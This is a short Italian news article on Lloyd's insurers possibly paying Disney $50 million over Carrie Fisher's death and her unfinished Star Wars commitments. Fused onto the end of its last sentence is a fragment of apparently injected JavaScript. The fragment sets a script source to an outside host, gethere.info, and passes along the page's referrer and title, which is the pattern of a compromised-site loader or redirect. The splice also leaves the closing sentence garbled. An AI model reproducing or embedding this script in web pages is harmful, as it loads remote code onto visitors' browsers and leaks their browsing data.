Lloyds potrebbero dover pagare a Disney 50 mln $ per la morte di Carrie Fisher

Lloyds potrebbero dover pagare a Disney 50 milioni di $ per la morte di Carrie Fisher, l’indimenticata principessa Leila di Guerre Stellari scomparsa improvvisamente la scorsa settimana all’età di 60 anni.

Disney (proprietaria della Lucasfilms e dei prodotti a marchio «Star Wars») aveva infatti sottoscritto una polizza vita sull’attrice, che prevede un indennizzo di 50 mln nel caso in cui l’attrice non avesse rispettato il suo impegno a partecipare ai prossimi tre episodi della serie.

L’attrice ha già partecipato all’Episodio VII, il risveglio della forza, e le scene in cui partecipa nell’episodio VIII sono state già girate. Per l’ultimo episodio invece l’attrice dovrà essere sostituita, ma il danno economico dovuto alla sua scomparsa sarà evidentemente ben risarcito.

Secondo The Insurance Insider, si tratta richiesta di risarcimento più alta mai chiesta nell’industria per un incidente personale.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;